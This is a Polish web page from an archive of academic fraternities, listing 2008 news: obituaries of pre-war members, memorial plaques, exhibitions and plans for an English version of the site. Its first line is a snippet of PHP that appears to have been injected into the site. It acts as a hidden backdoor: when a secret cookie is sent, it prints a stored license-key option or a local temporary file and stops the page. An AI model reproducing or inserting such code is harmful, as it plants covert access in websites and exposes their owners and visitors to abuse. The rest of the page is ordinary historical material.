if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Aktualności 2008

Strona Archiwum i Muzeum Polskich Korporacji Akademickich - statystyki 2008

W 2008 r. stronę Archiwum odwiedzono 16.002 razy (średnio ok. 1330/miesiąc). Obejrzano 66.350 podstron (średnio ok. 5500/miesiąc).

Strona była najczęściej odwiedzona w listopadzie (1884 wizyt), a najrzadziej w sierpniu (621 wizyt). W grudniu obejrzano najwięcej podstron (8563), a w czerwcu najmniej (3174).

__________________________________________________________________________________________

Rozszerzenie strony Archiwum Korporacyjnego

Strona główna witryny Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich

W najbliższym tygodniach strona internetowa Archiwum Korporacyjnego ulegnie znacznemu rozszerzeniu. Prosimy o wybaczenie, jeśli wystąpiłyby przejściowe niedogodności techniczne:)

W ramach prowadzonych prac dodanych zostanie około 20 podstron, w tym w Muzeum Polskich Korporacji Akademickich opracowania poświęcone 16 dotychczas nie przedstawionym szerzej na stronie korporacjom warszawskim (Arkonia, Welecja, Maltanja) oraz poznańskim (Posnania, Legia, Mercuria, Slensania, Laconia, Hermesia, Aesculapia, Icaria, Gedania Posnaniensis, Odra, Codania, Iustitia, Husaria).

W związku z podjętymi pracami będziemy wdzięczni za pomoc, a w szczególności za wszelkie materiały i informacje dotyczące zarówno wyżej wymienionych korporacji, jak także dotychczas nie przedstawionych na stronie polskich korporacji akademickich (vide “Pozostałe” w Muzeum Korporacyjne). Prosimy także o nadsyłanie biogramów przedwojennych członków korporacji.

Wszystkim osobom, które przyczyniły i przyczynią się do tego rozszerzenia witryny Muzeum Polskich Korporacji Akademickich jesteśmy bardzo zobowiązani!

_________________________________________________________________________________________

W hołdzie korporantom-powstańcom wielkopolskim

Tablica poświęcona korporantom-powstańcom wielkopolskim

Z okazji 90. rocznicy wybuchu Powstania Wielkopolskiego dnia 25 stycznia 2009 r. odsłonięta zostanie tablica pamiątkowa poświęcona korporantom-powstańcom wielkopolskim.

Na tablicy imiennie wymieniono dziesięć wybitnych postaci reprezentujących polski ruch korporacyjny. Są to dwaj dowódcy Powstania gen. Józef Dowbor-Muśnicki (Lechia) oraz gen. Stanisław Taczak (Lechia), a także gen. Władysław Anders (Arkonia), mec. dr Stanisław Celichowski (Filomatia Posnaniensis), sędzia Sądu Najwyższego Kazimierz Daszyński (Magna-Polonia), prof. Wiktor Dega (Icaria), por. rez. Feliks Dropiński (Masovia), ks. gen. Józef Prądzyński (Baltia), płk. dr Bernard Śliwiński (Surma) oraz gen. prof. Ireneusz Wierzejewski (Chrobria).

Tablica znajdzie się w miejscu najściślej związanym z Powstaniem - przy placu Wolności w Poznaniu. Dzięki uprzejmości Kurii Metropolitalnej uzyskano zgodę na jej umieszczenie na elewacji gmachu Księgarni św. Wojciecha. Poświęcenia tablicy dokona w dniu 25 stycznia 2009 r. o godz. 12.30 ks. abp. Stanisław Gądecki. Serdecznie zapraszamy!

Tablica powstanie w ramach, realizowanego z inicjatywy Archiwum Korporacyjnego przez Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich i ze wsparciem Poznańskiego Koła Międzykorporacyjnego, projektu “Nowe tablice korporacyjne - w 25. rocznicę odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu” (vide Tablice pamiątkowe). Stroną merytoryczną projektu zajmuje się Archiwum Korporacyjne, a organizacyjno-finansową Fundacja “Polskie Korporacje Akademickie”.

_________________________________________________________________________________________

Lech Działoszyński, fidułka Korporacji Masovia, Poznań 24 XI 2007 r.

96. urodziny prof. Lecha Działoszyńskiego. Vivat Filister!

Dnia 21 grudnia 2008 r. 96. rocznice urodzin obchodził jeden z nestorów ruchu korporacyjnego prof. Lech Działoszyński członek Korporacji Masovia oraz członek honorowy Korporacji Magna-Polonia.

Prof. Lech Działoszyński był w latach 1991-1994 pierwszym prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich. Zasłużył się także dla reaktywacji Poznańskiego Koła Międzykorporacyjnego oraz powstania Archiwum Korporacyjnego (vide Archiwum Korporacyjne).

Ad multos annos!

_________________________________________________________________________________________

Jerzy Jasieński, akcja Ostatni Filistrzy, Warszawa 31 VII 2007 r.

+ Jerzy Jasieński, Polonus (1913-2008)

Dnia 7 grudnia 2008 r. zmarł Jerzy Jasieński, ostatni przedwojenny członek Konwentu Polonia z Wilna.

Jerzy Jasieński urodził się dnia 25 maja 1913 r. we Władykaukazie. Odbył studia prawnicze na Uniwersytecie Stefana Batorego oraz muzyczne w Konwersatorium Muzycznym w Wilnie. W czasie studiów w 1938 r. wstąpił do Konwentu Polonia.

W trakcie drugiej wojny światowej był żołnierzem Armii Krajowej. Po wojnie pracował jako pianista, krytyk i publicysta muzyczny. W latach 1964-66 był dyrektorem i kierownikiem artystycznym Teatru Polskiego, a następnie Teatru Wielkiego w Warszawie. W latach 1980-89 pełnił funkcję wicedyrektora Polskiego Wydawnictwa Muzycznego oraz dyrektora Centralnej Biblioteki Nutowej. Organizował liczne festiwale muzyczne, w szczególności pierwsze edycje Festiwalu Muzyki Polskiej oraz Międzynarodowy Festiwal Muzyki Współczesnej „Warszawska Jesień”. W 1955 r. piastował stanowisko sekretarza V Międzynarodowego Konkursu Pianistycznego im. Fryderyka Chopina. Na emeryturze zajmował się działalnością naukową prowadząc miedzy innymi badania dotyczące twórczości Ignacego Jana Paderewskiego. W 2006 r. został odznaczony Krzyżem Komandorskim Orderu Odrodzenia Polski z Gwiazdą, a w 2007 r. uhonorowany złotym medalem „Zasłużony Kulturze - Gloria Artis”.

Pochowany został dnia 12 grudnia 2008 r. na Starych Powązkach w Warszawie.

________________________________________________________________________________________

Działalność i oblicze ideowe poznańskich i polskich korporacji akademickich - prelekcje multimedialne

Prelekcja Bartłomieja Wróblewskiego nt. Korporacje akademickie w Poznaniu w latach 1920-2008: rozkwit, okres PRL-u, odrodzenie, Poznań 27 XI 2008 r.

W ostatnim tygodniu odbyły się w Poznaniu prelekcje poświęcone historii, tradycjom i współczesności poznańskich i polskich korporacji akademickich.

Dnia 27 listopada 2008 r. w ramach organizowanej przez Korporację Masovia konferencji nt. “Stowarzyszenia akademickie - tradycja i nowoczesność” przedstawiono dwa referaty poświęcone korporacjom akademickim. Bartłomiej Wróblewski z Korporacji Lechia zaprezentował przekrojowy referat dotyczący historii korporacji akademickich w Poznaniu (”Korporacje akademickie w Poznaniu w latach 1920-2008: rozkwit, okres PRL-u, odrodzenie”).

Okładka katalogu konferencji.

Z kolei Paweł Florkiewicz z Korporacji Magna-Polonia poświęcił swe wystąpienie funkcjonowaniu współczesnych korporacji akademickich (”Życiu korporanta na co dzień”). Konferencja odbyła się na Wydziale Historii Uniwersytetu im. Adama Mickiewicza w Poznaniu.

Tydzień później dnia 5 grudnia 2008 r. odbyła się organizowana przez poznański Instytut Pamięci Narodowej konferencja nt. “Niezłomni” Lech Neyman i Stanisław Kasznica 1908-1948. Historia ostatnich przywódców NSZ. W jej ramach Bartłomiej Wróblewski zaprezentował referat pt. “Działalność i oblicze ideowe ruchu korporacyjnego w II Rzeczypospolitej”.

Obu referatom historycznym towarzyszyła prezentacja multimedialna kilkudziesięciu fotografii z Archiwum Korporacyjnego obrazujących historię i tradycje poznańskich i polskich korporacji akademickich. Od strony technicznej przygotował je Jakub Pokora z Korporacji Masovia.

________________________________________________________________________________________

+ Stanisław Śniechórski, Concordus (1913-2008)

Stanisław Śniechórski, Prezes Korporacji Concordia w roku akademickim 1935/36

W środę dnia 26 listopada 2008 r. zmarł w Warszawie w wieku 95 lat mec. Stanisław Śniechórski z lubelskiej Korporacji Concordia.

Stanisław Śniechórski urodził się dnia 21 czerwca 1913 r. w Warszawie. Po zdaniu matury rozpoczął studia prawnicze na Katolickim Uniwersytecie Lubelskim. W 1932 r. wstąpił do Korporacji Concordia, w której sprawował w roku akademickim 1935/36 funkcję prezesa. Po ukończeniu studiów rozpoczął aplikację adwokacką w Warszawie. Przez całe życie wykonywał zawód adwokata. Podczas drugiej wojny światowej walczył w Kampanii Wrześniowej i Powstaniu Warszawskim. Był dwukrotnie ranny. Po wojnie odznaczony został między innymi Krzyżem Oficerskim Orderu Odrodzenia Polski.

Po 1989 r. Stanisław Śniechórski był aktywnym członkiem Stowarzyszenia Filistrów Polskich Korporacji Akademickich. W 2000 r. dzięki jego staraniom została reaktywowana Korporacja Concordia. Przez wiele lat służył także pomocą Archiwum Korporacyjnemu przy zbieraniu materiałów poświęconych lubelskim korporacjom akademickim. W 2007 r. ze Stanisławem Śniechórskim został przeprowadzony wywiad w ramach akcji Ostatni Filistrzy.

W czwartek dnia 4 grudnia 2008 r. o godz. 13.00 odprawione zostanie w Kościele pw. Św. Karola Boromeusza w Warszawie na Powązkach nabożeństwo żałobne, a następnie odbędzie się pogrzeb. Requiescat in pace.

_________________________________________________________________________________________

+ prof. Witold Hensel, Surmita (1917-2008)

Dnia 22 listopada 2008 r. zmarł w Warszawie w wieku 91 lat prof. Witold Hensel, ostatni przedwojenny członek Korporacji Akademickiej “Surma”.

Witold Hensel urodził się dnia 29 marca 1917 r. w Gnieźnie. Po uzyskaniu świadectwa dojrzałości rozpoczął studia na Wydziale Humanistycznym Uniwersytetu Poznańskiego. W dniu 7 grudnia 1935 r. został przyjęty do Korporacji Akademickiej “Surma”.

W latach 1951-1956 był profesorem na Uniwersytecie Poznańskim, a od 1954 r. na Uniwersytecie Warszawskim. Od 1954 r. zajmował także stanowisko dyrektora Instytutu Historii Kultury Materialnej PAN w Warszawie (obecnie Instytut Archeologii i Etnografii PAN). Był współorganizatorem i pierwszym Prezesem Unii Archeologii Słowiańskiej w latach 1965-1967. W 1965 r. został członkiem rzeczywistym Polskiej Akademii Nauk. W latach 1985-89 był posłem IX kadencji na Sejm PRL z ramienia Stronnictwa Demokratycznego. W 1986 r. został obdarzony godnością doktora honoris causa Uniwersytetu im. Adama Mickiewicza. W 2007 r. otrzymał medal Lux et Laus, przyznawany przez Stały Komitet Mediewistów Polskich za wyjątkowe zasługi w badaniach historycznych

Kierował badaniami archeologicznymi w Polsce (Poznań, Kruszwica), Bułgarii, Francji oraz Algierii. Był redaktorem naczelnym periodyku PAN pt. Archaeologia Polona. Na Jego dorobek naukowy składa się ponad 800 prac i publikacji.

W 2006 r. z prof. Witoldem Henslem został przeprowadzony wywiad w ramach akcji Ostatni Filistrzy. Dnia 11 listopada 2006 r. jako jedyny obok prof. Eligiusza Preislera żyjący jeszcze wówczas przedwojenny członek Surmy wyraził zgodę na reaktywację Korporacji. Doszło do niej dnia 31 maja 2008 r. na Komersie LXXXVII-lecia Poznańskiego Koła Międzykorporacyjnego.

Pogrzeb odbędzie się dnia 27 listopada 2008 r. o godz. 10.00 na Cmentarzu Powązkowskim w Warszawie. Requiescat in pace.

_________________________________________________________________________________________

Wystawa “Dwudziestolecie. Oblicza nowoczesności” na Zamku Królewskim w Warszawie

Zaproszenie na wystawę “Dwudziestolecie. Oblicza nowoczesności”, Zamek Królewski w Warszawie 11 X 2008 - 10 II 2009

Dnia 11 listopada 2008 r. z okazji 90. rocznicy odzyskania niepodległości na Zamku Królewskim w Warszawie otwarto - organizowaną przez Muzeum Historii Polski pod Honorowym Patronatem Prezydenta Rzeczypospolitej Polskiej prof. Lecha Kaczyńskiego - wystawę “Dwudziestolecie. Oblicza nowoczesności“. W ramach ekspozycji prezentowane są także materiały poświęcone korporacjom akademickim okresu międzywojnia.

Część “korporacyjna” wystawy

Na wystawie można zobaczyć około 30 pamiątek korporacyjnych pochodzących z naszego Archiwum Korporacyjnego, w tym dekle, szarfy, bandy, dewizki, dokumenty oraz fotografie po kilkunastu korporacjach z Wilna (Conradia, Leonidania, Piłsudia), Warszawy (Arkonia, Welecja, Sparta, Filomatia Varsoviensis), Lwowa (Slavia), Poznania (Magna-Polonia, Surma, Baltia, Silesia, Roma, Aesculapia), Krakowa (Sian, Chortycia, Emunah) oraz Lublina (Hetmania).

Wystawa potrwa do dnia 10 lutego 2009 r. Serdecznie zapraszamy!

_________________________________________________________________________________________

Tradycja zobowiązuje

Tradycja zobowiązuje - ruch korporacyjny w Poznaniu dawniej i dziś, XI-XII 2008r.

Dnia 4 listopada 2008 r. nastąpi otwarcie organizowanego przez Korporację Masovia projektu “Tradycja zobowiązuje - ruch korporacyjny w Poznaniu dawniej i dziś“. Ma on przybliżyć poznańskim studentom i wykładowcom korporacje akademickie. W ramach projektu zaprezentowane zostaną na Uniwersytecie im. A. Mickiewicza i Politechnice Poznańskiej trzy wystawy przedwojennych i współczesnych fotografii korporacyjnych oraz odbędzie się konferencja, na której poruszane będą tematy związane z wychowaniem, postawami obywatelskimi i ruchem korporacyjnym.

Nad projektem patronat honorowy objęli Ich Magnificencje Prorektor Uniwersytetu prof. Zbigniew Pilarczyk oraz Prorektor Politechniki prof. Stefan Trzcieliński, a patronat medialny katolickie Radio EMAUS. Projekt jest współfinansowany w ramach Funduszu Inicjatyw Obywatelskich.

Archiwum Korporacyjne uczestniczy w projekcie w dwojaki sposób. Po pierwsze, w trakcie organizowanych wystaw prezentowanych będzie kilkadziesiąt fotografii z naszych zbiorów, a podczas planowanej konferencji zostanie wygłoszony wykład dotyczący historii polskiego ruchu korporacyjnego. Po drugie, w ramach projektu zdygitalizowane zostanie około 60 wywiadów z ostatnimi żyjącymi przedwojennymi korporantami. Wywiady te przeprowadzono i zarejestrowano audiowizualnie w roku akademickim 2006/2007 w ramach koordynowanej przez Pawła Ratajczaka z K! Masovia akcji Ostatni Filistrzy.

_________________________________________________________________________________________

+ Antoni Wierzchosławski, Masoviak i Polonus (1915-2008)

Antoni Wierzchosławski, Komers PKM-u 31 V 2008 r.

Dnia 31 października 2008 r. doszła do nas smutna wiadomość o śmierci Antoniego Wierzchosławskiego z Korporacji Masovia, członka honorowego Korporacji Magna-Polonia. Był on jednym z najbardziej zasłużonych i najbardziej kochanych przedwojennych korporantów.

Antoni Wierzchosławski urodził się dnia 13 czerwca 1915 r. w Marcinkowie Górnym w rodzinie włościańskiej. Był jednym z siedmiorga dzieci Józefa i Józefy z domu Brauza. Uczęszczał do szkoły podstawowej w Gąsawie, a w latach 1925-1933 do Państwowego Gimnazjum Klasycznego (”starego typu”) w Bydgoszczy. Był członkiem Sodalicji Mariańskiej, Koła Filomatów oraz Koła Wioślarskiego. W 1933 r. zdał egzamin dojrzałości oraz rozpoczął studia prawa i ekonomii na Wydziale Prawno-Ekonomicznym Uniwersytetu Poznańskiego. W 1934 r. został przyjęty do Korporacji Masovia, z którą pozostał związany do końca życia. W semestrze letnim r.a. 1935/1936 pełnił funkcję sekretarza, w semestrze zimowym r. a. 1936/1937 prezesa, a w r.a. 1937/1938 wiceprezesa Konwentu. W trakcie studiów był także zaangażowany w Sodalicji Mariańskiej oraz Młodzieży Wszechpolskiej. Po ukończeniu studiów prawniczych został aplikantem sądowym. Po rocznym szkoleniu ukończył w lipcu 1939 r. Dywizyjny Kurs Podchorążych Rezerwy. W czasie kampanii wrześniowej walczył jako dowódca sekcji granatników w 59. Pułku Piechoty. Brał udział między innymi w Bitwie pod Dobrzykowym i Bitwie nad Bzurą. Został ranny, a po kapitulacji twierdzy Modlin wzięty do niewoli. Zwolniony jesienią 1939 r., w sierpniu 1940 r. został wraz z rodziną wysiedlony do tzw. Generalnej Guberni, a następnie wywieziony na roboty przymusowe do Niemiec. W 1941 r. wrócił do kraju. Brał udział w pracy konspiracyjnej i był żołnierzem Narodowej Organizacji Wojskowej. W 1945 r. ożenił się z Krystyną Bełtowską z Krakowa, z którą miał cztery córki. Z powodów politycznych po 1945 r. nie mógł ukończyć aplikacji sędziowskiej. W latach 1945-1990 pracował w administracji wojewódzkiej w Krakowie i Nowym Sączu, a po przejściu na emeryturę także w administracji spółdzielczej.

Po 1989 r. był aktywnym działaczem organizacji kombatanckich oraz korporacyjnych. Mimo podeszłego wieku zachował młodzieńczą werwę i pogodę ducha. Przez ostatnie 20 lat nieprzerwanie i z dużą regularnością przyjeżdżał do Poznania, aby brać udział w działalności na nowo organizującego się środowiska korporacyjnego. Był oddanym członkiem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, w którym w latach 1994-1997 pełnił funkcję Członka Zarządu, a w latach 1997-2007 Wiceprezesa. Od końca lat 80-tych wraz z innymi członkami Masovii podejmował starania zmierzające do reaktywacji Konwentu. W 1996 r. wydał wraz z Łukaszem Jesse z okazji 70-tej rocznicy założenia Masovii “Księgę Pamiątkową Korporacji Studentów Uniwersytetu Poznańskiego Masovia”, a z Jego inspiracji doszło w 2006 r. do reaktywacji Konwentu.

Od 2001 r. Antoni Wierzchosławski czynnie wspierał powstanie i rozwój Archiwum Korporacyjnego i jako jeden z pierwszych korporantów przekazał do niego zbiór zachowanych pamiątek korporacyjnych (vide Podziękowania). W 2007 r. z Antonim Wierzchosławskim został przeprowadzony wywiad w ramach akcji Ostatni Filistrzy.

W 2004 r. został członkiem honorowym Korporacji Magna-Polonia. W jej imieniu dnia 31 maja 2008 r. w trakcie Komersu LXXXVII-lecia Poznańskiego Koła Międzykorporacyjnego pasował nowych członków reaktywowanej wówczas Korporacji Surma.

Do ostatnich dni życia pozostawał silnie emocjonalnie związany z Masovią, Magna-Polonią, Stowarzyszeniem oraz całym środowiskiem Poznańskiego Koła Międzykorporacyjnego. Po krótkiej, ale ciężkiej chorobie zmarł dnia 29 X 2008 r. w Krakowie. Pogrzeb odbędzie się dnia 7 listopada 2008 r. o godz. 13.40 na Cmentarzu Rakowickim w Krakowie. Requiescat in pace.

_________________________________________________________________________________________

Apel zmarłych Filistrów 1 XI 2007 - 31 X 2008

W okresie Wszystkich Świętych oraz Dnia Zadusznego nawiedzamy cmentarze i modlimy się za zmarłych członków korporacji akademickich. Spośród żyjących jeszcze przed rokiem około siedemdziesięciu pięciu ostatnich przedwojennych korporantów odeszło dwunastu. Wśród nich byli:

Romuald Iszkowski (4 VIII 1907 - 1 XI 2007) z gdańskiej K! Helania,
Władysław Sienkiewicz (25 V 1912 - 3 I 2008) z wileńskiej K! Leonidania (ostatni żyjący Leonidańczyk),
prof. Eligiusz Preisler (1 XII 1908 - 24 II 2008) z poznańskiej K! Surma,
Zygmunt Augustowski (1 I 1913 - 20 III 2008) z wileńskiego Konwentu Polonia,
dr Józef Krzyżaniak (21 II 1911 - 26 III 2008) z poznańskiej K! Chrobria, członek honorowy K! Magna-Polonia,
Zygmunt Baczyński (23 I 1919 - 4 IV 2008) z warszawskiej K! Jagiellonia,
Tomasz Zbigniew Szweycer (16 IV 1916 - 2 V 2008) z warszawskiej K! Jagiellonia,
Włodzimierz Jacek Głogowski (1914 - 28 V 2008) z warszawskiej K! Patria (ostatni żyjący Patryta),
Henryk Dereziński (1913 - 25 VIII 2008) z lwowskiej K! Lutyko-Venedya,
Tadeusz Czaplicki (31 V 1915 - 10 IX 2008) z warszawskiej K! Jagiellonia,
prof. Szczęsny Leszek Zgliczyński (20 XI 1914 - 2 X 2008) z wileńskiego Konwentu Polonia,
Antoni Wierzchosławski (15 VI 1915 - 29 X 2008) z poznańskiej K! Masovia.

Requiem aeternam dona eis Domine et lux perpetua luceat eis

Wielu ze zmarłych w ostatnim roku korporantów zasłużyło się dla odrodzenia po 1989 r. ruchu korporacyjnego, reaktywacji poszczególnych korporacji akademickich, a także w ostatnich latach dla rozwoju Archiwum Korporacyjnego (vide Podziękowania). Z większością z nich udało się w roku akademickim 2006/2007 zarejestrować wywiady wspomnieniowe (vide Ostatni Filistrzy).

_________________________________________________________________________________________

Vivant Seniorzy!

Dr Bolesław Skrzypczak, Zygfryd Wiktor Kordus, Bartłomiej Witkiewicz, Komers Rocznicowy Magna-Polonii, Poznań 11 III 2006 r.

Tempora mutantur et nos mutamur in illis. W przypadku niektórych osób można mieć wrażenie jakby czas w stosunku do nich się zatrzymał. W końcu października dwóch niezwykle zasłużonych dla odrodzenia po 1989 r. ruchu korporacyjnego Filistrów obchodzi urodziny.

Dnia 29 października 2008 r. senior Korporacji Baltia, członek honorowy Magna-Polonii dr Bolesław Skrzypczak świętuje 88 urodziny. Natomiast dnia 30 października 2008 r. 97 lat kończy nestor Korporacji Magna-Polonia i całego środowiska Poznańskiego Koła Międzykorporacyjnego Zygfryd Wiktor Kordus. Bolesław Skrzypczak był w latach 1997-2007 Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, a w 2002 r. jednym z głównych reaktywatorów Baltii. Z kolei Zygfryd Wiktor Kordus był Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich w latach 1994-1997, a w 2004 r. głównym reaktywatorem Magna-Polonii. Przez wiele lat obaj Filistrzy wspierali powołanie i rozwój Archiwum i Muzeum Polskich Korporacji Akademickich (vide Archiwum Korporacyjne).

Obu jubilatom najserdeczniejsze życzenia i gratulacje. Ad multos annos!

_________________________________________________________________________________________

Szczęsny Leszek Zgliczyński, akcja Ostatni Filistrzy, Warszawa 2 VIII 2007 r.

+ prof. Szczęsny Leszek Zgliczyński, Polonus (1914-2008)

Dnia 2 października 2008 r. zmarł w Warszawie w wieku 94 lat prof. Szczęsny Leszek Zgliczyński z wileńskiego Konwentu Polonia.

Szczęsny Leszek Zgliczyński urodził się 20 listopada 1914 r. w Lublinie. W 1932 r. ukończył państwowe Gimnazjum im. Staszica w Lublinie, a w latach 1932-1938 studiował medycynę na Uniwersytecie Stefana Batorego w Wilnie. W 1934 r. został przyjęty do Konwentu Polonia.

Był wieloletnim pracownikiem naukowym Akademii Medycznej w Warszawie. W latach 1962-1970 kierował Katedrą i Zakładem Radiologii Lekarskiej. W latach 1970-1980 pełnił funkcję kierownika Zakładu Rentgenodiagnostyki Wydziału Lekarskiego oraz dyrektora Instytutu Radiologii. W latach 1972-1979 był rektorem warszawskiej Akademii Medycznej. Posiadał znaczny dorobek naukowy. W uznaniu za zasługi otrzymał Krzyż Komandorski Orderu Polonia Restituta oraz liczne inne odznaczenia państwowe.

Uroczystości pogrzebowe odbyły się dnia 8 października 2008 r. na warszawskich Powązkach. em>Requiescat in pace.

_________________________________________________________________________________________

Serwis anglojęzyczny strony Archiwum Korporacyjnego

Biuro Tłumaczeń Specjalistycznych Pro Verba, www.proverba.pl

Regularnie na stronę Archiwum trafiają potomkowie przedwojennych korporantów, którzy mieszkają poza Polską i nie mówią już w naszym języku. Odwiedzają ją także inne osoby zainteresowane historią i tradycjami polskich korporacji akademickich, w szczególności członkowie korporacji akademickich z innych europejskich krajów (Niemcy, Austria, Szwajcaria, Łotwa, Estonia). Z myślą o tych grupach osób od kilku miesięcy pracujemy nad udostępnieniem anglojęzycznej wersji strony Archiwum i Muzeum Polskich Korporacji Akademickich.

MiDiO Biuro Tłumaczeń

Strona techniczna obcojęzycznego serwisu została ukończona w lipcu. Obecnie trwa tłumaczenie strony na język angielski. Zajmują się tym dwie firmy: Biuro Tłumaczeń Specjalistycznych Pro Verba (www.proverba.pl) oraz MiDiO Biuro Tłumaczeń (midio@prokonto.pl).

Koszt tłumaczenia całości oszacowany został na około 2000 zł. Szczęśliwie większość tej sumy zgodziły się pokryć dokonujące tłumaczenia firmy, co pozwoliło na szybkie rozpoczęcie pracy. Prowadzącym je Panu Maciejowi Andrzejczakowi oraz Panu Maciejowi Prostakowi należą się wyrazy szczególnej wdzięczności.

Do sfinansowania pozostaje jednak jeszcze około 25 procent kosztów tłumaczenia strony. Za wszelką pomoc w tym względzie będziemy zobowiązani (vide Finansowanie).

_________________________________________________________________________________________

+ Tadeusz Czaplicki, Jagiellon (1915-2008)

Tadeusz Czaplicki, lata 90-te (?)

Dnia 10 września 2008 r. zmarł w wieku 93 lat w Warszawie Tadeusz Czaplicki z warszawskiej Korporacji Jagiellonia.

Tadeusz Czaplicki urodził się dnia 31 maja 1915 r. w Jarantowicach na Kujawach jako szóste i ostatnie dziecko Lucjana oraz Marii z Szemplińskich. Był wychowankiem Gimnazjum Ziemi Kujawskiej we Włocławku oraz absolwentem Szkoły Głównej Gospodarstwa Wiejskiego w Warszawie. We wrześniu 1939 r. wałczył w obronie twierdzy Modlin. Został odznaczony Krzyżem Kampanii Wrześniowej 1939 r. oraz odznaką Weterana Walk o Niepodległość. W latach 1945-1949 pracował jako inspektor Państwowych Nieruchomości Ziemskich na Ziemiach Odzyskanych. Był długoletnim pracownikiem Biura Studiów i Projektów Wzorcowych Budownictwa Wiejskiego “Bisprol” oraz autorem podręczników akademickich z zakresu budownictwa rolnego.

Należał do najbardziej oddanych i zasłużonych członków Korporacji Jagiellonia. W latach powojennych był animatorem spotkań Jagiellonów oraz w latach 1995-2004 wydawcą biuletynu “Jagiellonia. Periodyk Koła Starych Strzech P.A.K. Jagiellonia”. W 2000 r. opublikował “Szlacheckie ostatki. Dwudziestowieczna opowieść polskiego ziemianina”. Wspomnienia kończą się słowami starego poloneza:

“Bracia cieszmy się nadzieją,
Że powrócą dawne czasy,
Że nam znowu zajaśnieją,
Karabele, słuckie pasy.

W tył wyloty, w górę wąsy,
Zręcznie poprawiwszy pasa,
Haj-że dalej, dalej w pląsy,
Haj-że hasa, hasa, hasa…”

Nabożeństwo żałobne zostanie odprawione w czwartek 18 września 2008 r. o godz. 10.30 w Kościele Św. Krzyża w Warszawie po czym nastąpi przewiezienie Trumny do Topoli Królewskiej koło Łęczycy i złożenie do grobu rodzinnego na cmentarzu parafialnym. Requiem aeternam dona eis Domine et lux perpetua luceat eis.

_________________________________________________________________________________________

Henryk Dereziński, Lwów 1936/1937

+ Henryk Dereziński, Lutyko-Veneda (1913-2008)

Dnia 25 sierpnia 2008 r. odszedł od nas w wieku 95 lat F! Henryk Dereziński z lwowskiej Korporacji Lutyko-Venedya, rocznik 1913, absolwent Akademii Medycyny Weterynaryjnej we Lwowie, coetus 1937, członek Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich.

Henryk Dereziński był nestorem zakopiańskich weterynarzy oraz przewodniczącym Klubu Owczarka Podhalańskiego. Jak napisano w jednym z nekrologów: “dzięki Panu Henrykowi i Jego pracy na Podhalu i w Polsce przetrwała rasa owczarków podhalańskich, która od czasów powojennych odchodziła powoli w zapomnienie.”

Pochowany został w sobotę dnia 30 sierpnia na cmentarzu dla zasłużonych Podhalan na Pęksowym Brzysku w Zakopanym. Requiescat in pace.

_________________________________________________________________________________________

Nowości na stronie Archiwum Korporacyjnego

W dniu 12 lipca znacznemu rozszerzeniu uległa witryna internetowa Archiwum Korporacyjnego – Archiwum i Muzeum Polskich Korporacji Akademickich. W ramach prowadzonych prac dodanych zostało 20 podstron, w tym kilkanaście poświęconych kolejnym dotychczas szerzej na stronie Archiwum nie przedstawionym korporacjom akademickim. Omówienia doczekały się korporacje wileńskie – Batoria, Conradia, Filomatia Vilnensis, warszawskie – Lechicja, Sarmatia, Patria oraz poznańskie – Surma, Chrobria, Silesia, Masovia, Roma, a także lwowska Śląsk i krakowska Silingia. W każdym ze środowisk korporacyjnych znalazło się także krótkie opracowanie podsumowujące stan poszukiwań w poszczególnych środowiskach korporacyjnych (”Pozostałe”).

Najwięcej korporacji, które doczekały się tym razem przedstawienia pochodzi ze środowiska poznańskiego. Wynika to z faktu, że to właśnie po korporacjach poznańskich znajduje się w Archiwum najwięcej zachowanych pamiątek. Własne podstrony będą także posiadały kolejne trzy korporacje wileńskie oraz kolejne trzy korporacje warszawskie. Mimo intensywnych poszukiwań w ostatnim czasie udało odnaleźć się jedynie pojedyncze insygnia korporacyjne ze Lwowa oraz Krakowa, co skutkuje niemożnością przedstawienia większej ilości korporacji z tych ośrodków. Jeszcze skromniejsze rezultaty przyniosły poszukiwania śladów po korporacjach z najmniejszych środowisk korporacyjnych (Lublin, Gdańsk) oraz terenów spoza II Rzeczypospolitej.

Ponadto na stronie Archiwum Korporacyjnego dokonano także innych zmian, a w szczególności dopracowaniu uległa strona graficzna projektu (prezentacja na stronie głównej, powiększenia fotografii, urozmaicone kolaże na podstronach). Warto podkreślić, że witryna Archiwum przygotowana została od strony technicznej do otworzenia serwisu anglojęzycznego.

Firma Oświetleniowa Markslojd Sp z o.o. (www.mlampy.pl)

Wszystkim osobom, które przyczyniły się do niniejszego rozszerzenia strony Archiwum i Muzeum Polskich Korporacji Akademickich jesteśmy bardzo wdzięczni! Szczególne podziękowania należą się już po raz kolejny Firmie Oświetleniowej Markslojd Sp. z o.o. (www.mlampy.pl), bez której pomocy finansowej dokonanie niniejszych zmian na stronie nie byłoby możliwe. Jej Prezesowi Panu Wieńczysławowi Michalskiemu jesteśmy szczerze zobowiązani.

Fotografie dekli i insygniów korporacyjnych wykonał Pan Antoni Chałupka, któremu także należą się wyrazy serdecznej wdzięczności. Przy tej okazji chcielibyśmy także podziękować wszystkim tym korporacjom akademickim, które umieściły na swych stronach internetowych odniesienia do strony Archiwum Korporacyjnego, a w szczególności Konwentowi Polonia, Z.A.G. Wisła, Magna-Polonii, Lechii, Surmie, Kujawji, Baltii, Masovii oraz Magna Polonii Vratislaviensis.Za wszelkie uwagi dotyczące strony Archiwum, zamieszczonych na niej informacji, a także pomoc, a w szczególności przekazywanie wiadomości o zmarłych członkach korporacji akademickich, kontaktów do ich rodzin, a także stworzenie możliwości przedstawienia kolejnych dotąd szerzej nie omówionych na stronie korporacji będziemy bardzo wdzięczni.Regularnie na stronę Archiwum trafiają rodziny przedwojennych korporantów, które mieszkają poza Polską i nie mówią już w naszym języku. Głównie z myślą o nich chcielibyśmy otworzyć serwis w języku angielskim. Ponieważ przekracza to nasze możliwości finansowo-organizacyjne bylibyśmy niezwykle zobowiązani za pomoc finansową lub translatorską, która umożliwiłaby 